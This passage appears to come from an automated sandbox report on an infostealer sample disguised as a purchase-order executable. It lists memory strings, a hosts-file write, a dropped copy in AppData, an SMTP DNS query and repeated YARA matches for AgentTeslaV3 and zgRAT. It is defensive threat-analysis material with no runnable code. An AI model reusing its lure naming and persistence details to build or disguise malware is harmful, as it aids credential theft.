00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.come
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comt
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%appdata
Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: smtp.transmase.com

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: initial sample Static PE information: Filename: Purchase order 450080088 proj. Allt Charnan.exe
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.cs Large array initialization: .cctor: array initializer size 11617
Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.cs Large array initialization: .cctor: array initializer size 11617
Source: Purchase order 450080088 proj. Allt Charnan.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_02D44358
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_02D4BC20
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_02D44348
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_02D440B8
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_02D440A9
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_07AAB338
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_07AA2C3F
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_07AA1900
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 0_2_07AA1910
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_00FCF080
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_00FCF3C8
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_00FC6120
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BFCCF8
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BFBF98
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BF9AE0
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BF1FF8
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BFB1C2
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_05BF0040
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_064B9F88
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_064B8520
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: 9_2_064B3330
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_01274358
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_0127BC20
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_012740A9
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_012740B8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_01274348
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_08CD9E40
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_08CD15F7
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_08CD02C8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 20_2_08CD02B8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_011A4358
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_011ABC20
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_011A40B8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_011A40A9
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_011A4348
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_08D59E40
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_08D502C8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_08D502B8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 23_2_08D515F7
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_02C0F380
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_02C0F6C8
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_02C06560
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_02C0CBE4
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_05792120
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0579F86B
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_05790040
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0579C820
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0579BAD0
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_06348B77
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0634DB40
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_06342FC0
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0634586D
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_06342E70
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_06340A40
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_06343FB0
Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe Code function: 25_2_0634B158
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe Code function: String function: 05BF5A68 appears 54 times
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000000.239580570.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.293254846.0000000007A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000008.00000000.278239975.0000000000378000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000000.279735908.00000000007B8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.512965723.0000000000B58000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Binary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: NpPgfycY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: jVULYR.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
